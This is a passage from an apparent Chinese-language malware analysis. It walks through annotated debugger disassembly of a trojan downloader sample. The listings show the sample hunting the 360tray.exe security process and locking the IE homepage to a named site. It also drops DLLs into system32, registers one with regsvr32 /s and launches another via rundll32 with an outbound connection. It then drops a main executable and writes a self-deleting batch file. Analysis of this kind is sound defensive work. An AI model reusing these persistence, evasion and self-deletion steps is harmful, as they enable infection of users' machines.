00404087|.33F6 XOR ESI,ESI
00404089|>834D FC FF OR DWORD PTR SS:,FFFFFFFF
0040408D|.8D4D F0 LEA ECX,DWORD PTR SS:
00404090|.E8 17D4FFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00404095|.8B4D F4 MOV ECX,DWORD PTR SS:
00404098|.8BC6 MOV EAX,ESI
0040409A|.5E POP ESI
0040409B|.64:890D 00000>MOV DWORD PTR FS:,ECX
004040A2|.C9 LEAVE
004040A3\.C3 RETN
8、遍历进程查找“360tray.exe或360TRAY.EXE”找到也干掉
00404389/$55 PUSH EBP
0040438A|.8BEC MOV EBP,ESP
0040438C|.81EC 30020000 SUB ESP,230
00404392|.53 PUSH EBX
00404393|.33DB XOR EBX,EBX
00404395|.53 PUSH EBX ; /ProcessID = 0
00404396|.6A 02 PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
00404398|.E8 5BD4FFFF CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot
0040439D|.8D8D D4FEFFFF LEA ECX,DWORD PTR SS:
004043A3|.8945 FC MOV DWORD PTR SS:,EAX
004043A6|.51 PUSH ECX ; /pProcessentry
004043A7|.50 PUSH EAX ; |hSnapshot
004043A8|.C785 D4FEFFFF>MOV DWORD PTR SS:,128 ; |
004043B2|.E8 3BD4FFFF CALL <JMP.&KERNEL32.Process32First> ; \Process32First
004043B7|.85C0 TEST EAX,EAX
004043B9|.74 70 JE SHORT 复件_123.0040442B
004043BB|.56 PUSH ESI
004043BC|.8B35 50504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.OutputD>;kernel32.OutputDebugStringA
004043C2|.57 PUSH EDI
004043C3|.BF F0E34300 MOV EDI,复件_123.0043E3F0 ;ASCII "Find 360 Process"
004043C8|>8D85 F8FEFFFF /LEA EAX,DWORD PTR SS:
004043CE|.68 E4E34300 |PUSH 复件_123.0043E3E4 ; /s2 = "360tray.exe"
004043D3|.50 |PUSH EAX ; |s1
004043D4|.FF15 88514000 |CALL DWORD PTR DS:[<&MSVCRT.strstr>] ; \strstr
004043DA|.59 |POP ECX
004043DB|.85C0 |TEST EAX,EAX
004043DD|.59 |POP ECX
004043DE|.75 18 |JNZ SHORT 复件_123.004043F8
004043E0|.8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:
004043E6|.68 D8E34300 |PUSH 复件_123.0043E3D8 ; /s2 = "360TRAY.EXE"
004043EB|.50 |PUSH EAX ; |s1
004043EC|.FF15 88514000 |CALL DWORD PTR DS:[<&MSVCRT.strstr>] ; \strstr
004043F2|.59 |POP ECX
004043F3|.85C0 |TEST EAX,EAX
004043F5|.59 |POP ECX
004043F6|.74 1E |JE SHORT 复件_123.00404416
004043F8|>8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:
004043FE|.50 |PUSH EAX ; /src
004043FF|.8D85 D0FDFFFF |LEA EAX,DWORD PTR SS: ; |
00404405|.50 |PUSH EAX ; |dest
00404406|.E8 C7D1FFFF |CALL <JMP.&MSVCRT.strcpy> ; \strcpy
0040440B|.8B9D DCFEFFFF |MOV EBX,DWORD PTR SS:
00404411|.59 |POP ECX
00404412|.59 |POP ECX
00404413|.57 |PUSH EDI
00404414|.FFD6 |CALL ESI
00404416|>8D85 D4FEFFFF |LEA EAX,DWORD PTR SS:
0040441C|.50 |PUSH EAX ; /pProcessentry
0040441D|.FF75 FC |PUSH DWORD PTR SS: ; |hSnapshot
00404420|.E8 C7D3FFFF |CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
00404425|.85C0 |TEST EAX,EAX
00404427|.^ 75 9F \JNZ SHORT 复件_123.004043C8
00404429|.5F POP EDI
0040442A|.5E POP ESI
0040442B|>FF75 FC PUSH DWORD PTR SS: ; /hObject
0040442E|.FF15 60504000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
00404434|.33C0 XOR EAX,EAX
00404436|.3BC3 CMP EAX,EBX
00404438|.5B POP EBX
00404439|.1BC0 SBB EAX,EAX
0040443B|.F7D8 NEG EAX
0040443D|.C9 LEAVE
0040443E\.C3 RETN
9、查找IEXPLORE.EXE锁定主页为 http://www.rom12580.cn
HKEY_CLASSES_ROOTCLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
004041DA/$B8 20194000 MOV EAX,123.00401920
004041DF|.E8 0CD4FFFF CALL 123.004015F0
004041E4|.81EC 14020000 SUB ESP,214
004041EA|.56 PUSH ESI
004041EB|.8D4D E8 LEA ECX,DWORD PTR SS:
004041EE|.E8 0ACFFFFF CALL 123.004010FD
004041F3|.8365 FC 00 AND DWORD PTR SS:,0
004041F7|.BE 04010000 MOV ESI,104
004041FC|.8D85 E0FDFFFF LEA EAX,DWORD PTR SS:
00404202|.56 PUSH ESI ; /BufSize = 104 (260.)
00404203|.50 PUSH EAX ; |Buffer
00404204|.FF15 4C504000 CALL DWORD PTR DS:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA//获取windows系统目录
0040420A|.56 PUSH ESI ; /n => 104 (260.)
0040420B|.8D85 E4FEFFFF LEA EAX,DWORD PTR SS: ; |
00404211|.6A 00 PUSH 0 ; |c = 00
00404213|.50 PUSH EAX ; |s
00404214|.E8 3BD4FFFF CALL <JMP.&MSVCRT.memset> ; \memset
00404219|.8A85 E0FDFFFF MOV AL,BYTE PTR SS:
0040421F|.68 48E34300 PUSH 123.0043E348 ; /src = ":\Program Files\Internet Explorer\IEXPLORE.EXE"
00404224|.8885 E5FEFFFF MOV BYTE PTR SS:,AL ; |
0040422A|.8D85 E4FEFFFF LEA EAX,DWORD PTR SS: ; |
00404230|.50 PUSH EAX ; |dest
00404231|.C685 E4FEFFFF>MOV BYTE PTR SS:,22 ; |
00404238|.E8 9BD3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
0040423D|.8D85 E4FEFFFF LEA EAX,DWORD PTR SS:
00404243|.68 44E34300 PUSH 123.0043E344 ; /src = """
00404248|.50 PUSH EAX ; |dest
00404249|.E8 8AD3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
0040424E|.8D85 E4FEFFFF LEA EAX,DWORD PTR SS:
00404254|.68 40E34300 PUSH 123.0043E340 ; /src = " "
00404259|.50 PUSH EAX ; |dest
0040425A|.E8 79D3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
0040425F|.8D85 E4FEFFFF LEA EAX,DWORD PTR SS:
00404265|.68 28E34300 PUSH 123.0043E328 ; /src = "http://www.rom12580.cn"
0040426A|.50 PUSH EAX ; |dest
0040426B|.E8 68D3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
00404270|.83C4 2C ADD ESP,2C
00404273|.8D4D E8 LEA ECX,DWORD PTR SS:
00404276|.68 E0E24300 PUSH 123.0043E2E0 ;ASCII "CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command"
0040427B|.68 00000080 PUSH 80000000
00404280|.E8 E6CEFFFF CALL 123.0040116B //写入到注册表
00404285|.85C0 TEST EAX,EAX
00404287|.5E POP ESI
00404288|.75 11 JNZ SHORT 123.0040429B
0040428A|.8D85 E4FEFFFF LEA EAX,DWORD PTR SS:
00404290|.8D4D E8 LEA ECX,DWORD PTR SS:
00404293|.50 PUSH EAX
00404294|.6A 00 PUSH 0
00404296|.E8 A8DDFFFF CALL 123.00402043 //将IEXPLORE.EXE后添加http://www.rom12580.cn
0040429B|>834D FC FF OR DWORD PTR SS:,FFFFFFFF
0040429F|.8D4D E8 LEA ECX,DWORD PTR SS:
004042A2|.E8 8BCEFFFF CALL 123.00401132 //关闭注册表
004042A7|.8B4D F4 MOV ECX,DWORD PTR SS:
004042AA|.64:890D 00000>MOV DWORD PTR FS:,ECX
004042B1|.C9 LEAVE
004042B2\.C3 RETN
10、利用注册表锁定IE主页Call代码
0040116B /$ 56 PUSH ESI
0040116C |. 8BF1 MOV ESI,ECX
0040116E |. FF7424 0C PUSH DWORD PTR SS:
00401172 |. 8D4E 08 LEA ECX,DWORD PTR DS:
00401175 |. E8 38030000 CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
0040117A |. 83C6 04 ADD ESI,4
0040117D |. 56 PUSH ESI ; /pHandle
0040117E |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
00401183 |. 6A 00 PUSH 0 ; |Reserved = 0
00401185 |. FF7424 18 PUSH DWORD PTR SS: ; |Subkey
00401189 |. FF7424 18 PUSH DWORD PTR SS: ; |hKey
0040118D |. FF15 0C504000 CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00401193 |. 5E POP ESI
00401194 \. C2 0800 RETN 8
11、将IEXPLORE.EXE后添加http://www.rom12580.cn Call代码
00402043 /$ 56 PUSH ESI
00402044 |. 8BF1 MOV ESI,ECX
00402046 |. FF7424 0C PUSH DWORD PTR SS: ; /s
0040204A |. E8 C1F5FFFF CALL <JMP.&MSVCRT.strlen> ; \strlen
0040204F |. 59 POP ECX ; 0012FDC4
00402050 |. 40 INC EAX
00402051 |. 50 PUSH EAX ; /BufSize
00402052 |. FF7424 10 PUSH DWORD PTR SS: ; |Buffer
00402056 |. 6A 02 PUSH 2 ; |ValueType = REG_EXPAND_SZ
00402058 |. 6A 00 PUSH 0 ; |Reserved = 0
0040205A |. FF7424 18 PUSH DWORD PTR SS: ; |ValueName
0040205E |. FF76 04 PUSH DWORD PTR DS: ; |hKey
00402061 |. FF15 00504000 CALL DWORD PTR DS:[<&ADVAPI32.RegSetValu>; \RegSetValueExA
00402067 |. 5E POP ESI
00402068 \. C2 0800 RETN 8
12、释放文件到C:\windows\system32\zrrs1.dll、C:\windows\system32\dllcache\zrrs1.dll
004030CA /$ 55 PUSH EBP
004030CB |. 8BEC MOV EBP,ESP
004030CD |. 81EC 04010000 SUB ESP,104
004030D3 |. 53 PUSH EBX
004030D4 |. 56 PUSH ESI
004030D5 |. 8B35 4C504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.GetWind>; kernel32.GetWindowsDirectoryA //获取系统目录
004030DB |. 57 PUSH EDI
004030DC |. BF 04010000 MOV EDI,104
004030E1 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004030E7 |. 57 PUSH EDI ; /BufSize => 104 (260.)
004030E8 |. 50 PUSH EAX ; |Buffer
004030E9 |. FFD6 CALL ESI ; \GetWindowsDirectoryA
004030EB |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004030F1 |. 68 90E04300 PUSH 复件_123.0043E090 ; /src = "\System32\"
004030F6 |. 50 PUSH EAX ; |dest
004030F7 |. E8 DCE4FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
004030FC |. FF35 E8E54300 PUSH DWORD PTR DS: ; /src = "zrrs1.dll"
00403102 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS: ; |
00403108 |. 50 PUSH EAX ; |dest
00403109 |. E8 CAE4FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
0040310E |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
00403114 |. 50 PUSH EAX
00403115 |. E8 89E1FFFF CALL 复件_123.004012A3
0040311A |. 8B1D 50504000 MOV EBX,DWORD PTR DS:[<&KERNEL32.OutputD>; kernel32.OutputDebugStringA
00403120 |. 83C4 14 ADD ESP,14
00403123 |. 85C0 TEST EAX,EAX
00403125 |. 75 16 JNZ SHORT 复件_123.0040313D
00403127 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
0040312D |. 50 PUSH EAX ; /String
0040312E |. FFD3 CALL EBX ; \OutputDebugStringA
00403130 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
00403136 |. 50 PUSH EAX
00403137 |. E8 17FFFFFF CALL 复件_123.00403053
0040313C |. 59 POP ECX
0040313D |> 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
00403143 |. 57 PUSH EDI
00403144 |. 50 PUSH EAX
00403145 |. FFD6 CALL ESI
00403147 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
0040314D |. 68 7CE04300 PUSH 复件_123.0043E07C ; /src = "\System32\dllcache\"
00403152 |. 50 PUSH EAX ; |dest
00403153 |. E8 80E4FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
00403158 |. FF35 E8E54300 PUSH DWORD PTR DS: ; /src = "zrrs1.dll"
0040315E |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS: ; |
00403164 |. 50 PUSH EAX ; |dest
00403165 |. E8 6EE4FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
0040316A |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
00403170 |. 50 PUSH EAX
00403171 |. E8 2DE1FFFF CALL 复件_123.004012A3
00403176 |. 83C4 14 ADD ESP,14
00403179 |. 85C0 TEST EAX,EAX
0040317B |. 75 16 JNZ SHORT 复件_123.00403193
0040317D |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
00403183 |. 50 PUSH EAX
00403184 |. FFD3 CALL EBX
00403186 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
0040318C |. 50 PUSH EAX
0040318D |. E8 C1FEFFFF CALL 复件_123.00403053
00403192 |. 59 POP ECX
00403193 |> 5F POP EDI
00403194 |. 5E POP ESI
00403195 |. 5B POP EBX
00403196 |. C9 LEAVE
00403197 \. C3 RETN
13、创建D:\ssshall文件夹
00403211 /$ B8 B4184000 MOV EAX,复件_123.004018B4
00403216 |. E8 D5E3FFFF CALL 复件_123.004015F0
0040321B |. 51 PUSH ECX
0040321C |. 51 PUSH ECX
0040321D |. 56 PUSH ESI
0040321E |. 8D4D F0 LEA ECX,DWORD PTR SS:
00403221 |. E8 7AE2FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
00403226 |. 33F6 XOR ESI,ESI
00403228 |. 68 9CE04300 PUSH 复件_123.0043E09C ; ASCII "D:\ssshall"
0040322D |. 8D4D F0 LEA ECX,DWORD PTR SS:
00403230 |. 8975 FC MOV DWORD PTR SS:,ESI
00403233 |. E8 7AE2FFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
00403238 |. 51 PUSH ECX
00403239 |. 8D45 F0 LEA EAX,DWORD PTR SS:
0040323C |. 8BCC MOV ECX,ESP
0040323E |. 8965 EC MOV DWORD PTR SS:,ESP
00403241 |. 50 PUSH EAX
00403242 |. E8 5BE3FFFF CALL <JMP.&MFC42.#535_??0CString@@QAE@AB>
00403247 |. E8 4CFFFFFF CALL 复件_123.00403198
0040324C |. 3BC6 CMP EAX,ESI
0040324E |. 59 POP ECX
0040324F |. 75 19 JNZ SHORT 复件_123.0040326A
00403251 |. 51 PUSH ECX
00403252 |. 8D45 F0 LEA EAX,DWORD PTR SS:
00403255 |. 8BCC MOV ECX,ESP
00403257 |. 8965 EC MOV DWORD PTR SS:,ESP
0040325A |. 50 PUSH EAX
0040325B |. E8 42E3FFFF CALL <JMP.&MFC42.#535_??0CString@@QAE@AB>
00403260 |. E8 74FFFFFF CALL 复件_123.004031D9
00403265 |. 3BC6 CMP EAX,ESI
00403267 |. 59 POP ECX
00403268 |. 74 1C JE SHORT 复件_123.00403286
0040326A |> 51 PUSH ECX
0040326B |. 8D45 F0 LEA EAX,DWORD PTR SS:
0040326E |. 8BCC MOV ECX,ESP
00403270 |. 8965 EC MOV DWORD PTR SS:,ESP
00403273 |. 50 PUSH EAX
00403274 |. E8 29E3FFFF CALL <JMP.&MFC42.#535_??0CString@@QAE@AB>
00403279 |. E8 77FFFFFF CALL 复件_123.004031F5
0040327E |. 3BC6 CMP EAX,ESI
00403280 |. 59 POP ECX
00403281 |. 74 03 JE SHORT 复件_123.00403286
00403283 |. 6A 01 PUSH 1
00403285 |. 5E POP ESI
00403286 |> 834D FC FF OR DWORD PTR SS:,FFFFFFFF
0040328A |. 8D4D F0 LEA ECX,DWORD PTR SS:
0040328D |. E8 1AE2FFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00403292 |. 8B4D F4 MOV ECX,DWORD PTR SS:
00403295 |. 8BC6 MOV EAX,ESI
00403297 |. 64:890D 00000>MOV DWORD PTR FS:,ECX
0040329E |. 5E POP ESI
0040329F |. C9 LEAVE
004032A0 \. C3 RETN
14、释放文件regsvr32/sC:\windows\System32\iksii.dll注册到注册表,释放的这个文件居然报毒了
病毒名:Trojan-Downloader.Win32.Adload.vk(微点定义)
004033B1 /$ 55 PUSH EBP
004033B2 |. 8BEC MOV EBP,ESP
004033B4 |. 81EC 08020000 SUB ESP,208
004033BA |. 56 PUSH ESI
004033BB |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004033C1 |. 68 04010000 PUSH 104 ; /BufSize = 104 (260.)
004033C6 |. 50 PUSH EAX ; |Buffer
004033C7 |. FF15 4C504000 CALL DWORD PTR DS:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
004033CD |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004033D3 |. 68 90E04300 PUSH 复件_123.0043E090 ; /src = "\System32\"
004033D8 |. 50 PUSH EAX ; |dest
004033D9 |. E8 FAE1FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
004033DE |. FF35 E4E54300 PUSH DWORD PTR DS: ; /src = "iksii.dll"
004033E4 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS: ; |
004033EA |. 50 PUSH EAX ; |dest = "C:\windows\System32\"
004033EB |. E8 E8E1FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
004033F0 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004033F6 |. 50 PUSH EAX
004033F7 |. E8 A7DEFFFF CALL 复件_123.004012A3
004033FC |. 8B35 50504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.OutputD>; kernel32.OutputDebugStringA
00403402 |. 83C4 14 ADD ESP,14
00403405 |. 85C0 TEST EAX,EAX
00403407 |. 75 16 JNZ SHORT 复件_123.0040341F
00403409 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
0040340F |. 50 PUSH EAX ; /String
00403410 |. FFD6 CALL ESI ; \OutputDebugStringA
00403412 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
00403418 |. 50 PUSH EAX
00403419 |. E8 E1FEFFFF CALL 复件_123.004032FF
0040341E |. 59 POP ECX
0040341F |> 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:
00403425 |. 68 C4E04300 PUSH 复件_123.0043E0C4 ; /src = "regsvr32 /s "
0040342A |. 50 PUSH EAX ; |dest
0040342B |. E8 A2E1FFFF CALL <JMP.&MSVCRT.strcpy> ; \strcpy
00403430 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
00403436 |. 50 PUSH EAX ; /src
00403437 |. 8D85 F8FDFFFF LEA EAX,DWORD PTR SS: ; |
0040343D |. 50 PUSH EAX ; |dest
0040343E |. E8 95E1FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
00403443 |. 83C4 10 ADD ESP,10
00403446 |. 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:
0040344C |. 50 PUSH EAX
0040344D |. FFD6 CALL ESI
0040344F |. 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:
00403455 |. 50 PUSH EAX
00403456 |. E8 1BFFFFFF CALL 复件_123.00403376
0040345B |. 59 POP ECX
0040345C |. 5E POP ESI
0040345D |. C9 LEAVE
0040345E \. C3 RETN
15、注入到rundll32.exe进程并运行,向外网请求连接
004032A1 /$ 55 PUSH EBP
004032A2 |. 8BEC MOV EBP,ESP
004032A4 |. 81EC 04010000 SUB ESP,104
004032AA |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004032B0 |. 68 B8E04300 PUSH 复件_123.0043E0B8 ; /src = "rundll32 "
004032B5 |. 50 PUSH EAX ; |dest
004032B6 |. E8 17E3FFFF CALL <JMP.&MSVCRT.strcpy> ; \strcpy
004032BB |. FF35 E8E54300 PUSH DWORD PTR DS: ; /src = "zrrs1.dll"
004032C1 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS: ; |
004032C7 |. 50 PUSH EAX ; |dest
004032C8 |. E8 0BE3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
004032CD |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004032D3 |. 68 A8E04300 PUSH 复件_123.0043E0A8 ; /src = " , InstallMyDll"
004032D8 |. 50 PUSH EAX ; |dest
004032D9 |. E8 FAE2FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat
004032DE |. 83C4 18 ADD ESP,18
004032E1 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004032E7 |. 50 PUSH EAX ; /String
004032E8 |. FF15 50504000 CALL DWORD PTR DS:[<&KERNEL32.OutputDebu>; \OutputDebugStringA
004032EE |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004032F4 |. 6A 05 PUSH 5 ; /ShowState = SW_SHOW
004032F6 |. 50 PUSH EAX ; |CmdLine
004032F7 |. FF15 58504000 CALL DWORD PTR DS:[<&KERNEL32.WinExec>] ; \WinExec //到此进程多了一个rundll32.exe
004032FD |. C9 LEAVE
004032FE \. C3 RETN
16、释放病毒母体到C:\Windows\system32\xxggyu.exe
00401077 /$ 55 PUSH EBP
00401078 |. 8BEC MOV EBP,ESP
0040107A |. 81EC 04010000 SUB ESP,104
00401080 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
00401086 |. 68 04010000 PUSH 104 ; /BufSize = 104 (260.)
0040108B |. 50 PUSH EAX ; |Buffer
0040108C |. FF15 4C504000 CALL DWORD PTR DS:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
00401092 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
00401098 |. 68 30004100 PUSH 复件_123.00410030 ; /src = "\system32\"
0040109D |. 50 PUSH EAX ; |dest
0040109E |. E8 35050000 CALL <JMP.&MSVCRT.strcat> ; \strcat
004010A3 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004010A9 |. 68 24004100 PUSH 复件_123.00410024 ; /src = "xxggyu.exe"
004010AE |. 50 PUSH EAX ; |dest
004010AF |. E8 24050000 CALL <JMP.&MSVCRT.strcat> ; \strcat
004010B4 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004010BA |. 50 PUSH EAX
004010BB |. E8 E3010000 CALL 复件_123.004012A3
004010C0 |. 83C4 14 ADD ESP,14
004010C3 |. 85C0 TEST EAX,EAX
004010C5 |. 75 1A JNZ SHORT 复件_123.004010E1
004010C7 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004010CD |. 50 PUSH EAX ; /String
004010CE |. FF15 50504000 CALL DWORD PTR DS:[<&KERNEL32.OutputDebu>; \OutputDebugStringA
004010D4 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004010DA |. 50 PUSH EAX
004010DB |. E8 20FFFFFF CALL 复件_123.00401000
004010E0 |. 59 POP ECX
004010E1 |> 68 C8000000 PUSH 0C8 ; /Timeout = 200. ms
004010E6 |. FF15 54504000 CALL DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep
004010EC |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:
004010F2 |. 6A 01 PUSH 1 ; /ShowState = SW_SHOWNORMAL
004010F4 |. 50 PUSH EAX ; |CmdLine
004010F5 |. FF15 58504000 CALL DWORD PTR DS:[<&KERNEL32.WinExec>] ; \WinExec //
004010FB |. C9 LEAVE
004010FC \. C3 RETN
17、释放批处理文件删除自身并退出
004040A4 /$ 55 PUSH EBP
004040A5 |. 8BEC MOV EBP,ESP
004040A7 |. 81EC 14090000 SUB ESP,914
004040AD |. 53 PUSH EBX
004040AE |. 56 PUSH ESI
004040AF |. 57 PUSH EDI
004040B0 |. 6A 40 PUSH 40
004040B2 |. 33DB XOR EBX,EBX
004040B4 |. 59 POP ECX
004040B5 |. 33C0 XOR EAX,EAX
004040B7 |. 8DBD EDFEFFFF LEA EDI,DWORD PTR SS:
004040BD |. 889D ECFEFFFF MOV BYTE PTR SS:,BL
004040C3 |. 889D ECF6FFFF MOV BYTE PTR SS:,BL
004040C9 |. F3:AB REP STOS DWORD PTR ES:
004040CB |. 66:AB STOS WORD PTR ES:
004040CD |. AA STOS BYTE PTR ES:
004040CE |. B9 FF010000 MOV ECX,1FF
004040D3 |. 33C0 XOR EAX,EAX
004040D5 |. 8DBD EDF6FFFF LEA EDI,DWORD PTR SS:
004040DB |. BE D4E24300 MOV ESI,复件_123.0043E2D4 ; ASCII "375O540.bat"
004040E0 |. F3:AB REP STOS DWORD PTR ES:
004040E2 |. 66:AB STOS WORD PTR ES:
004040E4 |. AA STOS BYTE PTR ES:
004040E5 |. 8D7D F4 LEA EDI,DWORD PTR SS:
004040E8 |. 8D85 ECFEFFFF LEA EAX,DWORD PTR SS:
004040EE |. A5 MOVS DWORD PTR ES:,DWORD PTR DS:[ES>
004040EF |. A5 MOVS DWORD PTR ES:,DWORD PTR DS:[ES>
004040F0 |. 68 04010000 PUSH 104 ; /BufSize = 104 (260.)
004040F5 |. 50 PUSH EAX ; |PathBuffer
004040F6 |. 53 PUSH EBX ; |hModule => NULL
004040F7 |. A5 MOVS DWORD PTR ES:,DWORD PTR DS:[ES>; |
004040F8 |. FF15 28504000 CALL DWORD PTR DS:[<&KERNEL32.GetModuleF>; \GetModuleFileNameA
004040FE |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:
00404104 |. 68 C8E24300 PUSH 复件_123.0043E2C8 ; /String2 = "@echo off"
00404109 |. 50 PUSH EAX ; |String1
0040410A |. FF15 40504000 CALL DWORD PTR DS:[<&KERNEL32.lstrcpyA>] ; \lstrcpyA
00404110 |. 8B35 3C504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.lstrcat>; kernel32.lstrcatA
00404116 |. 6A 0A PUSH 0A
00404118 |. 5F POP EDI
00404119 |> 8D85 ECF6FFFF /LEA EAX,DWORD PTR SS:
0040411F |. 68 ACE24300 |PUSH 复件_123.0043E2AC ; ASCII "@echo 375O540>>575.aqq"
00404124 |. 50 |PUSH EAX
00404125 |. FFD6 |CALL ESI
00404127 |. 4F |DEC EDI
00404128 |.^ 75 EF \JNZ SHORT 复件_123.00404119
0040412A |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:
00404130 |. 68 9CE24300 PUSH 复件_123.0043E29C ; ASCII "@del 575.aqq"
00404135 |. 50 PUSH EAX
00404136 |. FFD6 CALL ESI
00404138 |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:
0040413E |. 68 94E24300 PUSH 复件_123.0043E294 ; ASCII "@del ""
00404143 |. 50 PUSH EAX
00404144 |. FFD6 CALL ESI
00404146 |. 8D85 ECFEFFFF LEA EAX,DWORD PTR SS:
0040414C |. 50 PUSH EAX
0040414D |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:
00404153 |. 50 PUSH EAX
00404154 |. FFD6 CALL ESI
00404156 |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:
0040415C |. 68 90E24300 PUSH 复件_123.0043E290 ; ASCII """
00404161 |. 50 PUSH EAX
00404162 |. FFD6 CALL ESI
00404164 |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:
0040416A |. 68 88E24300 PUSH 复件_123.0043E288 ; ASCII "@del "
0040416F |. 50 PUSH EAX
00404170 |. FFD6 CALL ESI
00404172 |. 8D45 F4 LEA EAX,DWORD PTR SS:
00404175 |. 50 PUSH EAX
00404176 |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:
0040417C |. 50 PUSH EAX
0040417D |. FFD6 CALL ESI
0040417F |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:
00404185 |. 68 80E24300 PUSH 复件_123.0043E280 ; ASCII "@exit"
0040418A |. 50 PUSH EAX
0040418B |. FFD6 CALL ESI
0040418D |. 53 PUSH EBX ; /hTemplateFile
0040418E |. 53 PUSH EBX ; |Attributes
0040418F |. 6A 02 PUSH 2 ; |Mode = CREATE_ALWAYS
00404191 |. 53 PUSH EBX ; |pSecurity
00404192 |. 53 PUSH EBX ; |ShareMode
00404193 |. 8D45 F4 LEA EAX,DWORD PTR SS: ; |
00404196 |. 68 00000040 PUSH 40000000 ; |Access = GENERIC_WRITE
0040419B |. 50 PUSH EAX ; |FileName
0040419C |. FF15 5C504000 CALL DWORD PTR DS:[<&KERNEL32.CreateFile>; \CreateFileA
004041A2 |. 8BF0 MOV ESI,EAX
004041A4 |. 8D45 F0 LEA EAX,DWORD PTR SS:
004041A7 |. 53 PUSH EBX ; /pOverlapped
004041A8 |. 50 PUSH EAX ; |pBytesWritten
004041A9 |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS: ; |
004041AF |. 68 00080000 PUSH 800 ; |nBytesToWrite = 800 (2048.)
004041B4 |. 50 PUSH EAX ; |Buffer
004041B5 |. 56 PUSH ESI ; |hFile
004041B6 |. FF15 68504000 CALL DWORD PTR DS:[<&KERNEL32.WriteFile>>; \WriteFile
004041BC |. 56 PUSH ESI ; /hObject
004041BD |. FF15 60504000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
004041C3 |. 8D45 F4 LEA EAX,DWORD PTR SS:
004041C6 |. 53 PUSH EBX ; /ShowState
004041C7 |. 50 PUSH EAX ; |CmdLine
004041C8 |. FF15 58504000 CALL DWORD PTR DS:[<&KERNEL32.WinExec>] ; \WinExec
004041CE |. 53 PUSH EBX ; /ExitCode
004041CF \. FF15 38504000 CALL DWORD PTR DS:[<&KERNEL32.ExitProces>; \ExitProcess
18、批处理文件代码如下
@echo off
@echo 375O540>>575.aqq
@echo 375O540>>575.aqq
